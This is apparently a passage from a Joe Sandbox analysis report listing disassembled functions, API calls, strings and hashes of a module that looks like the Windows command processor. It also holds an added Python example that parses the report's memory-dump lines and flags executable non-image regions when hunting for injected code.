• RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6A0E9AAEC
• RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF6A0E998C0), ref: 00007FF6A0E9AB39
• RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF6A0E998C0), ref: 00007FF6A0E9AB6F
• RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF6A0E998C0), ref: 00007FF6A0E9ABA4
• RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF6A0E998C0), ref: 00007FF6A0E9ABCB
Strings
Memory Dump Source
• Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
• Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
Similarity
• API ID: CloseDeleteValue$CreateOpen
• String ID: %s=%s
• API String ID: 1019019434-1087296587
• Opcode ID: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
• Instruction ID: 160f205e95fdf698a8f2a8e1524f4e0e357153422cbb8617eea0da59251cdc91
• Opcode Fuzzy Hash: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
• Instruction Fuzzy Hash: AE51D332B0A783A6E7608B25E4407BABAE1FF89780F548234DE4DC3795EF38D4559B00
APIs
Memory Dump Source
• Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
• Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
Similarity
• API ID: memset$FullNamePathwcsrchr
• String ID:
• API String ID: 4289998964-0
• Opcode ID: f574b9b165fedc960487e474b398108792cb4fddced71d8a368933aba93db8fb
• Instruction ID: 31996360922461fed1ffc5e96bf9fd73a9729b9739caa87b56dc7ec1a9c6bab7
• Opcode Fuzzy Hash: f574b9b165fedc960487e474b398108792cb4fddced71d8a368933aba93db8fb
• Instruction Fuzzy Hash: 7BC1B171B0B35BA2EE949B529548779A3A0FB45BD0F005539CE0E87BD1EF3CE891A340
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
• Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
Similarity
• API ID: InformationProcess$CurrentDirectoryQuery_setjmp_wcsnicmpwcsrchr
• String ID: %9d
• API String ID: 1006866328-2241623522
• Opcode ID: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
• Instruction ID: 584314e8e6697c1001848f46849e834c573d0aa5fcb5bb617292585b91cd71d2
• Opcode Fuzzy Hash: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
• Instruction Fuzzy Hash: 06516272A0A743AAE740CF21E8406A97BB4FB45794F408635DA2DD37A6DF3CE544EB40
APIs
Memory Dump Source
• Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
• Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
Similarity
• API ID: memset
• String ID:
• API String ID: 2221118986-0
• Opcode ID: 1a4803f2d100bf75eb873e70d7f896504ce2af50745e4dff0b3b1325a9c43adf
• Instruction ID: 5d99bb03fa24f23f1c3eb004f67337d4875a5d925f797104a76df9fe28371f9c
• Opcode Fuzzy Hash: 1a4803f2d100bf75eb873e70d7f896504ce2af50745e4dff0b3b1325a9c43adf
• Instruction Fuzzy Hash: 34C1F132F0A787A6EB64CB20E990AB963A4FF95784F044135DA1D877A2DF3CE555A300
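Every function entry above repeats the same eight "Memory Dump Source" lines for process 6, and the dotted .sdmp names are the only place the report records where each function body was lifted from. The Python below is an added example, not Joe Sandbox code: it parses those lines into region records and summarises the module layout. It assumes the dotted fields are process index, analysis stage, a sequence number, base address, then the region's Protect and Type values in winnt.h encoding (0x20 PAGE_EXECUTE_READ at image base +0x1000, 0x02 PAGE_READONLY for the headers and read-only data, 0x04 PAGE_READWRITE for writable data, 0x01000000 MEM_IMAGE); the two remaining fields are left uninterpreted. The sample input is the report's own lines for process 6 with the page's link text removed, plus one constructed line (not in this report) showing what an executable private region would look like, so the check for injected code has something to find.

```python
"""Added example (not Joe Sandbox code): parse 'Memory Dump Source' lines from a
Joe Sandbox function listing into region records and summarise the module layout.
Field meanings beyond process index, stage, base address, Protect and Type are
assumptions about the .sdmp naming scheme, not documented format."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: the Source/Associated lines of process 6 from this report,
# with the page's link text removed.
SAMPLE_DUMP_SOURCE = """\
• Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
• Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
"""

# Constructed (hypothetical) line, not from this report: an executable, private
# region of the kind injected code produces (PAGE_EXECUTE_READWRITE, MEM_PRIVATE).
SUSPICIOUS_SAMPLE = (
    "• Associated: 00000006.00000002.1415400000.000001D2A3B40000.00000040.00000001.00020000.00000004.sdmp\n"
)

# winnt.h memory constants. Assumption: dotted fields 5 and 7 of an .sdmp name are
# the region's Protect and Type values as VirtualQuery would report them.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
EXECUTE_MASK = 0xF0  # any PAGE_EXECUTE* bit

LINE_RE = re.compile(r"^\s*(?:•\s*)?(?P<role>Source File|Associated):\s*(?P<name>\S+?\.sdmp)")
SDMP_RE = re.compile(
    r"(?P<proc>[0-9A-Fa-f]{8})\.(?P<stage>[0-9A-Fa-f]{8})\.(?P<seq>[0-9A-Fa-f]+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<f6>[0-9A-Fa-f]{8})\."
    r"(?P<mtype>[0-9A-Fa-f]{8})\.(?P<f8>[0-9A-Fa-f]{8})\.sdmp"
)
OFFSET_RE = re.compile(r"Offset:\s*([0-9A-Fa-f]+)")


@dataclass(frozen=True)
class Region:
    role: str      # "source": dump the function was found in; "associated": sibling region
    process: int   # Joe Sandbox process index (first dotted field)
    stage: int     # analysis stage (second dotted field)
    base: int      # region base address
    protect: int   # raw Protect field
    mem_type: int  # raw Type field


def parse_region(line: str) -> Optional[Region]:
    """One '• Source File:' or '• Associated:' line -> Region, anything else -> None."""
    m = LINE_RE.match(line)
    f = SDMP_RE.fullmatch(m.group("name")) if m else None
    if not f:
        return None
    return Region(
        role="source" if m.group("role") == "Source File" else "associated",
        process=int(f["proc"], 16), stage=int(f["stage"], 16),
        base=int(f["base"], 16), protect=int(f["protect"], 16),
        mem_type=int(f["mtype"], 16),
    )


def parse_dump_sources(text: str) -> List[Region]:
    return [r for r in map(parse_region, text.splitlines()) if r is not None]


def parse_image_base(text: str) -> Optional[int]:
    """Image base from the 'Offset:' part of the Source File line."""
    m = OFFSET_RE.search(text)
    return int(m.group(1), 16) if m else None


def section_guess(region: Region, image_base: int) -> str:
    """Heuristic label: headers at +0, otherwise code / writable / read-only by protection."""
    p = region.protect & 0xFF
    if region.base == image_base:
        return "PE headers"
    if p & EXECUTE_MASK:
        return "code"
    if p in (0x04, 0x08):
        return "writable data"
    return "read-only data" if p == 0x02 else "unknown"


def module_layout(regions: List[Region], image_base: int) -> List[str]:
    """Regions at or above image_base, sorted, as 'offset protection type guess' rows."""
    rows = []
    for r in sorted((r for r in regions if r.base >= image_base), key=lambda r: r.base):
        prot = PAGE_PROTECT.get(r.protect & 0xFF, f"0x{r.protect:X}")
        kind = MEM_TYPE.get(r.mem_type, f"0x{r.mem_type:X}")
        rows.append(f"+0x{r.base - image_base:06X} {prot:<22} {kind:<11} {section_guess(r, image_base)}")
    return rows


def executable_non_image(regions: List[Region]) -> List[Region]:
    """Executable regions not backed by a mapped PE image: the shape injected code has."""
    return [r for r in regions if (r.protect & EXECUTE_MASK) and r.mem_type != 0x1000000]


if __name__ == "__main__":
    regs = parse_dump_sources(SAMPLE_DUMP_SOURCE)
    base = parse_image_base(SAMPLE_DUMP_SOURCE)
    print(f"process {regs[0].process}, stage {regs[0].stage}, image base 0x{base:X}")
    print("\n".join(module_layout(regs, base)))
    print("executable non-image regions:", executable_non_image(regs + parse_dump_sources(SUSPICIOUS_SAMPLE)))
```

Run over a whole report, executable_non_image lists the regions worth pulling first when hunting for an unpacked payload. For the eight regions of process 6 listed here it returns nothing: under the field assumptions above, every region is MEM_IMAGE with protections that follow a normal PE section layout (read-only headers at +0, one executable region at +0x1000, read-only then writable data after it), so the function bodies in this listing come from a normally mapped module rather than from an injected buffer.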
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6A0E7CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E7B9A1,?,?,?,?,00007FF6A0E7D81A), ref: 00007FF6A0E7CDA6
                                                                                            • Part of subcall function 00007FF6A0E7CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E7B9A1,?,?,?,?,00007FF6A0E7D81A), ref: 00007FF6A0E7CDBD
                                                                                          • memset.MSVCRT ref: 00007FF6A0E7BA2B
                                                                                          • wcschr.MSVCRT ref: 00007FF6A0E7BA8A
                                                                                          • wcschr.MSVCRT ref: 00007FF6A0E7BAAA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heapwcschr$AllocProcessmemset
                                                                                          • String ID: -$:.\$=,;$=,;+/[] "
                                                                                          • API String ID: 2872855111-969133440
                                                                                          • Opcode ID: e048727378a3460f555082e81c55544313692faeaf2a868744a414ec58a8adda
                                                                                          • Instruction ID: 0c5c964d48b15df265e6e80df794b71225244cbdc0c6a0c6b7949b69ec4c697d
                                                                                          • Opcode Fuzzy Hash: e048727378a3460f555082e81c55544313692faeaf2a868744a414ec58a8adda
                                                                                          • Instruction Fuzzy Hash: 8CB19132A0EA83A1EA709B15A48437966A0FF89B80F954235DE5EC3795DF3CE845A300
                                                                                          APIs
                                                                                          • wcschr.MSVCRT(?,?,?,?,?,?,?,00007FF6A0E86570,?,?,?,?,?,?,00000000,00007FF6A0E86488), ref: 00007FF6A0E86677
                                                                                          • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF6A0E86570,?,?,?,?,?,?,00000000,00007FF6A0E86488), ref: 00007FF6A0E8668F
                                                                                          • _errno.MSVCRT ref: 00007FF6A0E866A3
                                                                                          • wcstol.MSVCRT ref: 00007FF6A0E866C4
                                                                                          • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF6A0E86570,?,?,?,?,?,?,00000000,00007FF6A0E86488), ref: 00007FF6A0E866E4
                                                                                          • iswalpha.MSVCRT(?,?,?,?,?,?,?,00007FF6A0E86570,?,?,?,?,?,?,00000000,00007FF6A0E86488), ref: 00007FF6A0E866FE
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: iswdigit$_errnoiswalphawcschrwcstol
                                                                                          • String ID: +-~!$APerformUnaryOperation: '%c'
                                                                                          • API String ID: 2348642995-441775793
                                                                                          • Opcode ID: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                                                                          • Instruction ID: d18f7c49df57238008a06f6855a3e652e31171f370983c6ac220e12c435cea87
                                                                                          • Opcode Fuzzy Hash: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                                                                          • Instruction Fuzzy Hash: 47717A72D0AA87A6E7605F21D45017DB7A0FB89F89F54C032DA4E86394EF3DE488E750
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcsicmpwcschr$AttributesErrorFileLastwcsrchr
                                                                                          • String ID:
                                                                                          • API String ID: 1944892715-0
                                                                                          • Opcode ID: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                                                                          • Instruction ID: f27df09f70129af64119d30d6957277af660f08c295208c84af130852cdf283d
                                                                                          • Opcode Fuzzy Hash: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                                                                          • Instruction Fuzzy Hash: E2B1A171A0B783A6EB609F11A954179B6A1FF69B81F548435CA4EC73D2EF3CE444E310
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: LocalTime$ErrorLast_get_osfhandle
                                                                                          • String ID: %s$/-.$:
                                                                                          • API String ID: 1644023181-879152773
                                                                                          • Opcode ID: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                                                          • Instruction ID: c90b77946093ed0a62fd9608ecb1794cd83d947e291c71511e8aea78889d9121
                                                                                          • Opcode Fuzzy Hash: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                                                          • Instruction Fuzzy Hash: 9A91C332A0A683A5EB649B64D5402BEA3A0FF84BC4F944536DA4EC37E5DF3CE545E310
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
                                                                                          • String ID: $Application$System
                                                                                          • API String ID: 3377411628-1881496484
                                                                                          • Opcode ID: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
                                                                                          • Instruction ID: 2a4dc7fac50ed1507ca2ed8cef443dd77f3d9b12d046da0ded3557cb51d3352c
                                                                                          • Opcode Fuzzy Hash: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
                                                                                          • Instruction Fuzzy Hash: 11414872B09B42AAE7209B60E4403ED77B5FB89749F545136EA4E83B98EF3CD145C740
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6A0E806C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E7B4DB), ref: 00007FF6A0E806D6
                                                                                            • Part of subcall function 00007FF6A0E806C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E7B4DB), ref: 00007FF6A0E806F0
                                                                                            • Part of subcall function 00007FF6A0E806C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E7B4DB), ref: 00007FF6A0E8074D
                                                                                            • Part of subcall function 00007FF6A0E806C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E7B4DB), ref: 00007FF6A0E80762
                                                                                          • _wcsicmp.MSVCRT ref: 00007FF6A0E825CA
                                                                                          • _wcsicmp.MSVCRT ref: 00007FF6A0E825E8
                                                                                          • _wcsicmp.MSVCRT ref: 00007FF6A0E8260F
                                                                                          • _wcsicmp.MSVCRT ref: 00007FF6A0E82636
                                                                                          • _wcsicmp.MSVCRT ref: 00007FF6A0E82650
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcsicmp$Heap$AllocProcess
                                                                                          • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                                                                                          • API String ID: 3407644289-1668778490
                                                                                          • Opcode ID: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                                                                          • Instruction ID: 63e158f1a6b2e493dea714cb79fbdd183697de8c80dabeb9cf08d5df6d504552
                                                                                          • Opcode Fuzzy Hash: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                                                                          • Instruction Fuzzy Hash: 0F313071A1E603A6F7105F21E8113796AA5BF99B81F548439DA0EC63E5EF3CE408F711
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$File$Process$AllocCloseCreateFreeHandlePointerRead
                                                                                          • String ID: PE
                                                                                          • API String ID: 2941894976-4258593460
                                                                                          • Opcode ID: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                                                                                          • Instruction ID: 658ba53696c449f393504f4727f5440a95b31446592d24778806714ab9b0308b
                                                                                          • Opcode Fuzzy Hash: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                                                                                          • Instruction Fuzzy Hash: D9418E71609793A6EA208B11E41027AFBA0FF89BD1F484231EE9D83B95DF3CE455DB40
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
